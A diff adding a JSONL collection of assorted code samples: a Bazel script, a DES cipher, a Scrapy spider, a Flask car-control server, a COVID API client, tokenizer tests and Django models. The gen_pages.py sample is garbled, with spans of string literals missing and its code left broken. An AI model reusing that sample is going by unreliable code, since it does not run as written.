diff --git "a/847.jsonl" "b/847.jsonl" new file mode 100644--- /dev/null +++ "b/847.jsonl" @@ -0,0 +1,631 @@ +{"seq_id":"96690481","text":"#econding=utf8\nimport os\nimport subprocess\nDIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )\nOUTPUT_SCRIPT='''\nload(\"@hello_server//bazel-compilation-database:aspects.bzl\", \"compilation_database\")\n\ncompilation_database(\n name = \"compiledb\",\n targets = [\n \"//src:hello_server\",\n ],\n'''\n\n\ndef gen_compiledb():\n subprocess.call(\"bazel clean\", shell=True)\n f = open(DIR_OF_THIS_SCRIPT + \"/bazel-compilation-database/BUILD\", 'w+')\n print(OUTPUT_SCRIPT, file=f)\n exec_root = subprocess.check_output([\"bazel\", \"info\", \"execution_root\"]).decode('utf-8').replace('\\n', \"\")\n print(\" exec_root = \" + '\"' + exec_root + '\"' + \",\", file=f)\n print(\")\", file=f)\n f.close()\n subprocess.call(\"bazel build //src:hello_server\", shell=True)\n subprocess.call(\"bazel build //bazel-compilation-database:compiledb\", shell=True)\n subprocess.call(\"cp bazel-bin/bazel-compilation-database/compile_commands.json .\", shell=True)\n\ngen_compiledb()\n","sub_path":".gen_compiledb.py","file_name":".gen_compiledb.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"592937657","text":"from collections import deque\n\nn, m, t = map(int, input().split())\n\ncircles = [0]\n\nfor _ in range(n):\n circles.append(deque(list(map(int, input().split()))))\n\ncommands = []\n\nfor _ in range(t):\n x, d, k = map(int, input().split())\n commands.append((x, d, k))\n\nwhile (commands):\n x, d, k = commands.pop(0)\n for i in range(1, n + 1):\n # x의 배수인 원판만\n if (i % x == 0):\n if (d == 0):\n circles[i].rotate(k)\n else:\n circles[i].rotate(-k)\n\n # 인접수\n zeros = []\n # 1번 원판\n for i in range(m):\n if (i + 1 > m - 1):\n temp = 0\n else:\n temp = i + 1\n\n if (circles[1][i] == circles[1][i - 1] and circles[1][i] != 0):\n zeros.append((1, i))\n if (i - 1 < 0):\n zeros.append((1, m - 1))\n else:\n zeros.append((1, i - 1))\n if (circles[1][i] == circles[1][temp] and circles[1][i] != 0):\n zeros.append((1, i))\n zeros.append((1, temp))\n\n if (circles[1][i] == circles[2][i] and circles[1][i] != 0):\n zeros.append((1, i))\n zeros.append((2, i))\n\n # n번 원판\n for i in range(m):\n if (i + 1 > m - 1):\n temp = 0\n else:\n temp = i + 1\n\n if (circles[n][i] == circles[n][i - 1] and circles[n][i] != 0):\n zeros.append((n, i))\n if (i - 1 < 0):\n zeros.append((n, m - 1))\n else:\n zeros.append((n, i - 1))\n if (circles[n][i] == circles[n][temp] and circles[n][i] != 0):\n zeros.append((n, i))\n zeros.append((n, temp))\n\n if (circles[n][i] == circles[n - 1][i] and circles[n][i] != 0):\n zeros.append((n, i))\n zeros.append((n - 1, i))\n\n for i in range(2, n):\n # 2~n-1번원판\n for j in range(m):\n if (j + 1 > m - 1):\n temp = 0\n else:\n temp = j + 1\n\n if (circles[i][j] == circles[i][j - 1] and circles[i][j] != 0):\n zeros.append((i, j))\n if (j - 1 < 0):\n zeros.append((i, m - 1))\n else:\n zeros.append((i, j - 1))\n if (circles[i][j] == circles[i][temp] and circles[i][j] != 0):\n zeros.append((i, j))\n zeros.append((i, temp))\n if (circles[i][j] == circles[i - 1][j] and circles[i][j] != 0):\n zeros.append((i, j))\n zeros.append((i - 1, j))\n if (circles[i][j] == circles[i + 1][j] and circles[i][j] != 0):\n zeros.append((i, j))\n zeros.append((i + 1, j))\n\n zeros = list(set(zeros))\n\n if (zeros):\n for i in zeros:\n circles[i[0]][i[1]] = 0\n else:\n # 인접수가 
없는경우\n sum_temp = 0\n cnt = 0\n for i in range(1, n + 1):\n for j in range(m):\n if (circles[i][j] != 0):\n sum_temp += circles[i][j]\n cnt += 1\n try:\n sum_temp = sum_temp / cnt\n except:\n continue\n\n for i in range(1, n + 1):\n for j in range(m):\n if (circles[i][j] > sum_temp and circles[i][j] != 0):\n circles[i][j] -= 1\n elif (circles[i][j] < sum_temp and circles[i][j] != 0):\n circles[i][j] += 1\n # 각 단계별로 원판 상태출력\n '''\n for i in range(1,n+1):\n print(circles[i])\n print()\n '''\n\nans = 0\nfor i in range(1, n + 1):\n ans += sum(circles[i])\n\nprint(ans)\n","sub_path":"17822_원판 돌리기.py","file_name":"17822_원판 돌리기.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472945713","text":"import tables\n\n\ndef to_bits(s):\n result = []\n for c in s:\n bits = bin(ord(c))[2:]\n bits = '00000000'[len(bits):] + bits\n result.extend([int(b) for b in bits])\n return result\n\n\ndef from_bits(bits):\n chars = []\n for b in range(int(len(bits) / 8)):\n byte = bits[b * 8:(b + 1) * 8]\n chars.append(chr(int(''.join([str(bit) for bit in byte]), 2)))\n return ''.join(chars)\n\n\ndef apply_permutation(array, permutation):\n result = []\n for p in permutation:\n result.append(array[p - 1])\n return result\n\n\n# input: key = 56 bits\n# output: key = 64 bits\ndef get_extended_key(key):\n result = []\n sum = 0\n for i in range(56):\n result.append(key[i])\n sum += key[i]\n if (i + 1) in [7, 14, 21, 28, 35, 42, 49, 56]:\n result.append(int(sum % 2))\n sum = 0\n return result\n\n\n# input: key = 56 bits\n# output: keys[ {48 bits} ], len = 16 \ndef get_keys(key):\n extended_key = get_extended_key(key)\n result = []\n C = [apply_permutation(extended_key, tables.C0)]\n D = [apply_permutation(extended_key, tables.D0)]\n for i in range(16):\n C.append(C[i].copy())\n D.append(D[i].copy())\n for _ in range(tables.I[i]):\n C[i + 1].append(C[i + 1].pop(0))\n D[i + 1].append(D[i + 1].pop(0))\n new_key = apply_permutation(C[i + 1] + D[i + 1], tables.K)\n result.append(new_key)\n return result\n\n\n# input: string = 8 chars, key = 7 chars\n# output: string = 8 chars\ndef encrypt_block(string, key):\n keys = get_keys(to_bits(key))\n T0 = apply_permutation(to_bits(string), tables.IP)\n L = [T0[:32]]\n R = [T0[32:]]\n for i in range(1, 17):\n # L\n L.append(R[i - 1])\n\n # f1\n _F1 = apply_permutation(R[i - 1], tables.E)\n # f2\n _F2 = []\n for j in range(48):\n _F2.append((_F1[j] + keys[i - 1][j]) % 2)\n # f3\n _F3 = []\n for j in range(8):\n B = _F2[j * 6:(j + 1) * 6]\n a = B[0] * 2 + B[5]\n b = B[1] * 2 ** 3 + B[2] * 2 ** 2 + B[3] * 2 + B[4]\n _F3 += tables.BIN[tables.S[j][a][b]]\n # f4\n _F4 = apply_permutation(_F3, tables.P)\n\n # R\n R.append([])\n for j in range(32):\n R[i].append((L[i - 1][j] + _F4[j]) % 2)\n\n bits_result = apply_permutation(L[16] + R[16], tables.IP_)\n return from_bits(bits_result)\n\n\n# input: string = 8 chars, key = 7 chars\n# output: string = 8 chars\ndef decrypt_block(string, key):\n keys = get_keys(to_bits(key))\n T0 = apply_permutation(to_bits(string), tables.IP)\n L = [T0[:32]]\n R = [T0[32:]]\n for i in range(1, 17):\n # R\n R.append(L[i - 1])\n\n # f1\n _F1 = apply_permutation(L[i - 1], tables.E)\n # f2\n _F2 = []\n for j in range(48):\n _F2.append((_F1[j] + keys[15 - (i - 1)][j]) % 2)\n # f3\n _F3 = []\n for j in range(8):\n B = _F2[j * 6:(j + 1) * 6]\n a = B[0] * 2 + B[5]\n b = B[1] * 2 ** 3 + B[2] * 2 ** 2 + B[3] * 2 + B[4]\n _F3 += tables.BIN[tables.S[j][a][b]]\n # f4\n _F4 = 
apply_permutation(_F3, tables.P)\n\n # L\n L.append([])\n for j in range(32):\n L[i].append((R[i - 1][j] + _F4[j]) % 2)\n\n bits_result = apply_permutation(L[16] + R[16], tables.IP_)\n return from_bits(bits_result)\n\n\ndef encrypt(string, key):\n key = key[:7]\n while len(string) % 8 != 0:\n string += ' '\n result = \"\"\n for i in range(int(len(string) / 8)):\n result += encrypt_block(string[i * 8:(i + 1) * 8], key)\n return result\n\n\ndef decrypt(string, key):\n key = key[:7]\n while len(string) % 8 != 0:\n string += ' '\n result = \"\"\n for i in range(int(len(string) / 8)):\n result += decrypt_block(string[i * 8:(i + 1) * 8], key)\n return result\n","sub_path":"6term/isob/Lab2/DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402731922","text":"\nimport sys\nimport time\nimport glob\n\ndef getFileString(file_path):\n file_string = ''\n with open(file_path, 'r') as file_obj:\n file_string = file_obj.read()\n return file_string\n\ndef handleControlSequence(line, i):\n replacement = ''\n\n t_blank = False\n link_text = ''\n link_href = ''\n\n i += 1\n\n # handle text\n if line[i] == '{':\n i += 1\n while line[i] != '}':\n link_text += line[i]\n i += 1\n i += 1\n\n if line[i] == '*':\n t_blank = True\n i += 1\n\n while line[i] != '}':\n link_href += line[i]\n i += 1\n\n if len(link_text) == 0:\n link_text = link_href\n\n replacement = ' 0:\n\n if line.strip().startswith('include:'):\n attr = line.split(':')\n file_path = attr[1].strip()\n new_line += generateHTML(getFileString(file_path))\n new_file_string += new_line + '\\n'\n continue\n elif line.strip().startswith('img:'):\n attr = line.split(':')\n img_path = attr[1].strip()\n height = ''\n if len(attr) > 2:\n height = ' style=\"height: ' + attr[2] + 'px;\"'\n if len(attr) > 3 and 'l' in attr[3]:\n new_line += ''\n else:\n new_line += '
'\n else:\n indentation = ''\n while line[0] == ' ':\n indentation += ' '\n line = line[1:]\n if line[0:2] in ['- ', '+ ', '* ']:\n indentation += ' ' if line[0] == ' ' else line[0]\n line = line[1:]\n while line[0] == ' ':\n indentation += ' '\n line = line[1:]\n\n i = 0\n while i < len(line):\n if line[i:i+2] == ' ':\n new_line += '  '\n i += 1\n elif line[i] == '{':\n append, i = handleControlSequence(line, i)\n new_line += append\n else:\n new_line += line[i]\n i += 1\n\n if len(indentation) > 0:\n new_file_string += '
' + indentation + '' + new_line + '\\n'\n            continue\n\n        new_file_string += new_line + '
\\n'\n\n return new_file_string\n\ndef generateHTML_full(file_string):\n new_file_string = ''\n\n # top of html file\n with open('./include/top.html', 'r') as file_obj:\n new_file_string += file_obj.read()\n\n new_file_string += generateHTML(file_string)\n\n # bottom of html file\n with open('./include/bottom.html', 'r') as file_obj:\n new_file_string += file_obj.read()\n\n return new_file_string\n\ndef run():\n txt_files = glob.glob('./*.txt')\n\n for file_path in txt_files:\n\n file_name = file_path.split('/')[-1].split('.')[-2]\n file_string = getFileString(file_path)\n\n new_file_string = generateHTML_full(file_string)\n new_file_path = '../' + file_name + '.html'\n\n with open(new_file_path, 'w') as new_file_obj:\n new_file_obj.write(new_file_string)\n\nif '--dev' in sys.argv:\n print('Running...')\n while True:\n run()\n time.sleep(0.5)\nelse:\n run()","sub_path":"pages_source/gen_pages.py","file_name":"gen_pages.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446188221","text":"# -*- coding: utf-8 -*-\nimport re\nfrom tutorial.items import TutorialItem\nimport scrapy\n\n\nclass StackoverflowSpider(scrapy.Spider):\n name = 'stackoverflow'\n allowed_domains = ['stackoverflow.com']\n start_urls = ['https://stackoverflow.com/questions?page={}&sort=newest'.format(i)for i in range(1000,1010)]\n\n def parse(self, response):\n for summary in response.css(\".question-summary\"):\n item=TutorialItem()\n desc=summary.css('.excerpt::text').extract_first()\n #把\\r\\n替换掉,并且去除里面的null字符串\n item['desc']=re.sub(r'[\\r\\n]]','',desc).strip()\n # print('Desc:',desc)\n\n item['title']=summary.css('.summary h3 a::text').extract_first()\n # print('Title:',title)\n\n view=summary.css('.views::text').extract_first()\n item['view']=re.sub(r'[^\\d+]','',view)\n # print('User:',view)\n\n # item['start']=summary.css('.summary .started .user-info .user-action-time span::attr(title)').extract_first()\n item['start'] = summary.xpath('/html/body/div[3]/div/div[1]/div[2]/div[1]/div[2]/div[3]/div/div[1]/span/@title').extract_first()\n\n # print('Start time:',start)\n\n item['user']=summary.css('.summary .started .user-info .user-details a::attr(href)').extract_first()\n # print('user:',user)\n\n # item['answer']=summary.css('.summary .stats .statusunanswered strong::text').extract_first()\n item['answer'] = summary.xpath('/html/body/div[3]/div/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/strong/text()').extract_first()\n # print('answer:',answer)\n\n item['vote']=summary.css('.statscontainer .stats .vote .votes .vote-count-post strong::text').extract_first()\n # print('vote:',vote)\n yield item","sub_path":"tutorial/spiders/stackoverflow.py","file_name":"stackoverflow.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"363856052","text":"#Modified by smartbuilds.io\n#Date: 27.09.20\n#Desc: This web application serves a motion JPEG stream\n# main.py\n# import the necessary packages\nfrom flask import Flask, render_template, Response, request\nfrom car import CarControls\nfrom camera import VideoCamera\nimport time\nimport threading\nimport os\n\nleft = 2\nright = 3\nforward = 4\nbackward = 17\n\nCControl = CarControls(left,right,forward, backward)\n\npi_camera = VideoCamera(flip=True) # flip pi camera if upside down.\n\n# App Globals (do not edit)\napp = Flask(__name__)\n\n@app.route('/stopt', methods=['POST'])\ndef 
tStop():\n CControl.tStop()\n return('',204)\n\n@app.route('/stopg', methods=['POST'])\ndef gStop():\n CControl.gStop()\n return('',204)\n\n@app.route('/movel', methods=['POST'])\ndef leftTurn():\n CControl.left()\n return('',204)\n\n@app.route('/mover', methods=['POST'])\ndef rightTurn():\n CControl.right()\n return('',204)\n\n@app.route('/movef', methods=['POST'])\ndef foward():\n CControl.forward()\n return('',204)\n\n@app.route('/moveb', methods=['POST'])\ndef backward():\n CControl.backward()\n return('',204)\n\n@app.route('/moves', methods=['POST'])\ndef stop():\n CControl.stop()\n return('',204)\n\n@app.route('/')\ndef index():\n return render_template('index.html', carC = CControl) #you can customze index.html here\n\ndef gen(camera):\n #get camera frame\n while True:\n frame = camera.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(pi_camera),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\nif __name__ == '__main__':\n\n app.run(host='0.0.0.0', debug=False)\n \n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316585099","text":"import json\nimport os\nimport requests\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\n\"\"\"\nThis module contains the interface class used by the \nCorona Spread feature, making an API request to the\nCorona Monitor API, which is hosted at Rapid Api and\ncan be found here:\n\nhttps://rapidapi.com/astsiatsko/api/coronavirus-monitor/\n\"\"\"\n\n\nclass ApiHandle:\n\t\"\"\"\n\tCall api and parse output to JSON. Returns cache \n\tunless the data over 2 hours old by default as to not \n\toverload the api service. The object calls the api upon\n\tinstantiation, and will automatically cache the response.\n\n\t:uri:\n\t\tURI for the REST api\n\n\t:_last_api_call:\n\t\tdatetime stamp for when data was most recently fetched\n\t\tfrom the api, used to return cache within the defined\n\t\tspan upon construction, minmum 0 hours.\n\n\t:_wait_time:\n\t\tseconds calculated by the defined standby_hours parameter\n\n\t:_cached_response:\n\t\tlast response received by the API\n\n\t:_headers_:\n\t\tdictionary which can be added to with the add_header method.\n\t\tContains headers which will be used upon a request with the \n\t\tfetch() call.\n\t\"\"\"\n\n\tdef __init__(self, uri: str, standby_hours = 2):\n\t\tself.uri: str = uri\n\t\tself.last_api_call: datetime = None\n\t\tself._wait_time = (60 * 60) * standby_hours\n\t\tself._cached_response = None\n\t\tself._cached_response: dict = None\n\t\tself._headers = {}\n\n\t@property\n\tdef uri(self) -> str:\n\t\treturn self._uri\n\t\n\t@uri.setter\n\tdef uri(self, uri: str) -> None:\n\t\tif uri.startswith('https'):\n\t\t\tself._uri = uri\n\t\telse:\n\t\t\traise AttributeError('Got \"http\", expected \"https\"')\n\t\n\t@property\n\tdef last_api_call(self) -> str:\n\t\t\"\"\"\n\t\tReturn property in string format for easy readability\n\t\tfor users.\n\t\t\"\"\"\n\t\treturn self._last_api_call.strftime(\"%Y-%m-%d %H:%M\")\n\n\t@last_api_call.setter\n\tdef last_api_call(self, val: datetime) -> None:\n\t\tself._last_api_call = val\n\n\tdef add_header(self, key: str, value: str) -> None:\n\t\t\"\"\"\n\t\tAllows this object to add HTML headers for the \n\t\trequest. 
The method is meant to be used prior to\n\t\ta call for an API which requires headers to work.\n\n\t\t:param key:\n\t\t\tstr\n\t\t\tthe key in the header, example: 'User-Agent'\n\t\t:param vaue:\n\t\t\tstr\n\t\t\tThe value behind said key.\n\t\t:returns:\n\t\t\tNone\n\t\t\"\"\"\n\t\tself._headers[key] = value\n\n\tdef fetch(self) -> dict:\n\t\t\"\"\"\n\t\tCall the api and mutate the instance variable _cached_response\n\t\tat the same time, if either none prior were made or the time \n\t\texpired and it needs to be refreshed. \n\n\t\t:returns:\n\t\t\tdict\n\t\t\"\"\"\n\t\tif self._cached_response:\n\t\t\tseconds_since_last_call = (datetime.now() - self._last_api_call).seconds\n\t\t\tif seconds_since_last_call < self._wait_time: \n\t\t\t\treturn self._cached_response\n\t\ttry:\n\t\t\tresponse = requests.get(self.uri, headers = self._headers).json()\n\t\texcept Exception:\n\t\t\traise\n\t\t\n\t\tself._cached_response = response\n\t\tself.last_api_call = datetime.now()\n\t\treturn response\n\n\nclass Client:\n\t\"\"\"\n\tAct as the interface from the retreived data \n\tby an instance of the ApiHandle class.\n\n\tReturn infections by country, mortalities,\n\trecoveries based upon method call.\n\t\"\"\"\n\n\tdef __init__(self, api_handle: ApiHandle, translation_file_path: str):\n\t\tself.api_handle = api_handle\n\t\tself.translation_file_path = translation_file_path\n\n\tdef _translate(self, country: str, from_language: str) -> str:\n\t\t\"\"\"\n\t\tReturn the value behind key country parameter\n\t\twhich is the swedish translated string of given\n\t\tcountry.\n\t\t:param country:\n\t\t\tstring, country to translate\n\t\t:param from_language:\n\t\t\tstring, from which language. Either Swedish to English or vice versa.\n\t\t:returns:\n\t\t\tstring\n\t\t\"\"\"\n\t\tcountry = country.lower()\n\t\ttry:\n\t\t\twith open(self.translation_file_path, 'r', encoding = 'utf-8') as f:\n\t\t\t\ttranslation = json.loads(f.read())\n\t\texcept Exception as e:\n\t\t\traise Exception(f'Could not load translation file. 
{e}')\n\t\t\n\t\tif from_language == 'swedish':\n\t\t\treturn translation['swe_to_eng'][country]\n\t\treturn translation['eng_to_swe'][country]\n\n\tdef get_raw_data(self):\n\t\t\"\"\"\n\t\tReturns the raw api return without any parsing.\n\t\tfor debugging.\n\t\t\"\"\"\n\t\treturn self.api_handle.fetch()\n\n\tdef get_total_recoveries(self) -> int:\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\treturn sum([int(i['total_recovered'].replace(',','')) for i in data])\n\n\tdef get_total_infections(self) -> int:\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\treturn sum([int(i['cases'].replace(',','')) for i in data])\n\n\tdef get_total_deaths(self, sort_by_highest = True) -> str:\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\treturn sum([int(i['deaths'].replace(',','')) for i in data])\n\n\tdef get_recoveries(self, sort_by_highest = True) -> str:\n\t\tsorter = lambda i: int(i['total_recovered'].replace(',',''))\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tdata.sort(key = sorter, reverse = sort_by_highest)\n\t\ttranslated_country = self._translate(data[0]['country_name'], 'english')\n\t\treturn f\"{translated_country}: {data[0]['total_recovered']}\"\n\n\tdef get_infections(self, sort_by_highest = True) -> str:\n\t\tsorter = lambda i: int(i['cases'].replace(',',''))\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tdata.sort(key = sorter, reverse = sort_by_highest)\n\t\ttranslated_country = self._translate(data[0]['country_name'], 'english')\n\t\treturn f\"{translated_country}: {data[0]['cases']}\"\n\n\tdef get_deaths(self, sort_by_highest = True) -> str:\n\t\tsorter = lambda i: int(i['deaths'].replace(',',''))\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tdata.sort(key = sorter, reverse = sort_by_highest)\n\t\ttranslated_country = self._translate(data[0]['country_name'], 'english')\n\t\treturn f\"{translated_country}: {data[0]['deaths']}\"\t\n\n\tdef get_by_query(self, query: str, country_name: str) -> str:\n\t\t\"\"\"\n\t\tGet details on a country depending on query.\n\t\t:param data:\n\t\t\tstring representing deaths, recoveries or cases. These are:\n\t\t\t- 'cases'\n\t\t\t- 'recovered'\n\t\t\t- 'deaths'\n\t\t:param country: \n\t\t\tstring represenging country for lookup.\n\t\t:returns:\n\t\t\tstring\n\t\t\"\"\"\n\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tfor country in data:\n\t\t\tif country['country_name'].lower() == self._translate(country_name, 'swedish'):\n\t\t\t\treturn country[query]\n\t\traise KeyError(f'No such key: {country_name}')\n\n\tdef get_data_timestamp(self) -> str:\n\t\t\"\"\"\n\t\tReturns the datetime string under 'statistic_taken_at' key\n\t\tin response body from the API. 
This indicates when the\n\t\tstatistics were taken, thus how old the data is.\n\t\t:returns:\n\t\t\tstring, datetime\n\t\t\"\"\"\n\t\treturn self.api_handle.fetch()['statistic_taken_at']","sub_path":"source/coronafeatureclient.py","file_name":"coronafeatureclient.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"435823156","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nimport unittest\nimport operator\nimport sys\nimport os.path\nsys.path.append(os.path.abspath('..'))\nfrom mecab.writer import WordInfo\nfrom mecab import partofspeech as PoS\nfrom textproc.dataloader import getDataLoader\nfrom textproc.sentenceparser import MecabSentenceParser, PyPortSentenceParser\n\nclass SentenceParserTest(unittest.TestCase):\n def setUp(self):\n self.pyparser = PyPortSentenceParser(getDataLoader())\n self.exeparser = MecabSentenceParser()\n\n def testExeSimple(self):\n res = self.exeparser.tokenize('ですからあの人')\n expected = [WordInfo('ですから', 0, 'ですから', PoS.CONJ, 'デスカラ'),\n WordInfo('あの', 4, 'あの', PoS.FILLER, 'アノ'),\n WordInfo('人', 6, '人' ,PoS.NOUN, 'ヒト')]\n self.assertEquals(expected, res)\n\n def testPySimple(self):\n res = self.pyparser.tokenize('ですからあの人')\n expected = [WordInfo('ですから', 0, 'ですから', PoS.CONJ, 'デスカラ'),\n WordInfo('あの', 4, 'あの', PoS.FILLER, 'アノ'),\n WordInfo('人', 6, '人' ,PoS.NOUN, 'ヒト')]\n self.assertEquals(expected, res)\n\n\n def testMecabFailure(self):\n \"\"\"\n A test where Mecab fails to recognize the verb 滲み込む\n \"\"\"\n result = self.exeparser.tokenize('すべてに滲み込み')\n result = list(map(operator.attrgetter('dictionaryForm'), result))\n self.assertEquals(['すべて', 'に', '滲みる', '込み'], result)\n\n def testPyPort(self):\n result = self.pyparser.tokenize('所に着いたのは')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['所', 'に', '着い', 'た', 'の', 'は'], result)\n\n def testWhiteSpace(self):\n result = self.pyparser.tokenize('\\n所に着いたのは')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['所', 'に', '着い', 'た', 'の', 'は'], result)\n\n def testNumericKanji(self):\n result = self.pyparser.tokenize('一列縦隊')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['一', '列', '縦隊'], result)\n\n def testUnicodeErrorInString(self):\n result = self.pyparser.tokenize('ドンキ-・バー')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['ドンキ', '-', '・', 'バー'], result)\n\n\n\n def testTokenizeNum(self):\n \"\"\"\n ~\n \"\"\"\n result = self.pyparser.tokenize('九~九')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['九', '~', '九'], result)\n\n def testWhiteSpaceInside(self):\n result = self.pyparser.tokenize('\\n船が検 疫所に\\n')\n words = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['船', 'が', '検', '疫所', 'に'], words)\n positions = list(map(operator.attrgetter('startPos'), result))\n self.assertEquals([1, 2, 3, 5, 7], positions)\n\n def testTokenize2(self):\n res = self.pyparser.tokenize('所に着いたのは')\n expected = [ WordInfo('所', 0, '所', PoS.NOUN, 'トコロ'),\n WordInfo('に', 1, 'に', PoS.PRT_CASE, 'ニ'),\n WordInfo('着い', 2, '着く', PoS.VERB, 'ツイ'),\n WordInfo('た', 4, 'た', PoS.VERB_AUX, 'タ'),\n WordInfo('の', 5, 'の', PoS.NOUN_NONIND, 'ノ'),\n WordInfo('は', 6, 'は', PoS.PRT_BIND, 'ハ')\n ]\n self.assertEquals(expected, res)\n\n def testUnknownWord(self):\n res = self.pyparser.tokenize('デッキに昇って行った')\n expected = [ WordInfo('デッキ', 0, 'デッキ', PoS.NOUN, 'デッキ'),\n 
WordInfo('に', 3, 'に', PoS.PRT_CASE, 'ニ')\n ]\n self.assertEquals(expected, res[0:2])\n\n def testComma(self):\n result = self.pyparser.tokenize('や、船客')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEqual(['や', '、', '船客'], result)\n\n def testUnkUnk(self):\n result = self.pyparser.tokenize('はっぴー・ばれん')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEqual(['はっぴ', 'ー', '・', 'ばれ','ん'], result)\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(SentenceParserTest)\n unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"tests/test_sentenceparser.py","file_name":"test_sentenceparser.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467954910","text":"\n\n#calss header\nclass _TRIBUNE():\n\tdef __init__(self,): \n\t\tself.name = \"TRIBUNE\"\n\t\tself.definitions = [u'used in the titles of some newspapers: ', u\"in ancient Rome, an elected official whose job was to protect people's rights\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_tribune.py","file_name":"_tribune.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195027521","text":"from ckeditor.fields import RichTextField\nfrom django.db import models\nfrom blog_website.utils.models import BaseModel\nfrom user.models import User\n\n\nclass ArticleCategory(BaseModel):\n \"\"\"文章分类\"\"\"\n name = models.CharField(max_length=10, verbose_name='名称', help_text='不超过10个字')\n parent = models.ForeignKey('self', null=True, blank=True, related_name='subs',\n on_delete=models.CASCADE, verbose_name='父类别')\n describe = models.CharField(max_length=100, default='', verbose_name='类别描述', help_text='不超过100个字')\n image_url = models.CharField(max_length=1000, null=True, verbose_name='类别图片')\n\n class Meta:\n db_table = 'article_category'\n verbose_name = '文章分类'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n \"\"\"文章\"\"\"\n author = models.ForeignKey(User, null=True, blank=True,\n on_delete=models.CASCADE, verbose_name='作者')\n title = models.CharField(max_length=50, verbose_name='标题', help_text='b不超过50字')\n content = RichTextField(verbose_name='内容')\n category1 = models.ForeignKey(ArticleCategory, on_delete=models.PROTECT,\n related_name='cat1', verbose_name='一级分类')\n category2 = models.ForeignKey(ArticleCategory, on_delete=models.PROTECT,\n related_name='cat2', verbose_name='二级分类')\n read_count = models.IntegerField(default=0, verbose_name='阅读量')\n index_image = models.CharField(max_length=1000, null=True, verbose_name='文章主图')\n is_top = models.BooleanField(default=False, verbose_name='是否置顶')\n like_count = models.IntegerField(default=0, verbose_name='点赞数')\n describe = models.TextField(default='', verbose_name='文章描述', help_text='用于列表页展示文章简介')\n labels = models.ManyToManyField('Label', verbose_name='文章标签')\n\n class Meta:\n db_table = 'article'\n verbose_name = '文章'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.title\n\n\nclass Label(BaseModel):\n \"\"\"文章标签\"\"\"\n name = models.CharField(max_length=20, verbose_name='文章标签', help_text='不超过20个字')\n\n class Meta:\n db_table = 'label'\n verbose_name = 
'标签'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.name\n","sub_path":"blog_website/blog_website/apps/article/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327699407","text":"import tensorflow as tf\n\n\"\"\"\na=tf.Variable(0)\nb=tf.Variable(1)\nc=tf.add(a,b)\n\nupdate1=tf.assign(a,tf.add(a,b))\nupdate2=tf.assign(a,tf.add(a,c))\nupdate3=tf.assign(b,tf.add(a,b))\nupdate4=tf.assign(b,tf.add(c,b))\n#update5=tf.assign(c,tf.add(a,c))\n#update6=tf.assign(c,tf.add(c,b))\nsess=tf.Session()\ninit_op=tf.initialize_all_variables()\nsess.run(init_op)\n\nsess.run(update1)\nprint(sess.run([a,b,c]))\nsess.run(update2)\nprint(sess.run([a,b,c]))\nsess.run(update3)\nprint(sess.run([a,b,c]))\nsess.run(update4)\nprint(sess.run([a,b,c]))\n\nsess.close()\n\"\"\"\nweights=tf.Variable(tf.random_normal([7,2],stddev=0.35),name=\"weights0\")\nbiases=tf.Variable(tf.zeros([200]),name=\"biases0\")\n# Create another variable with the same value as 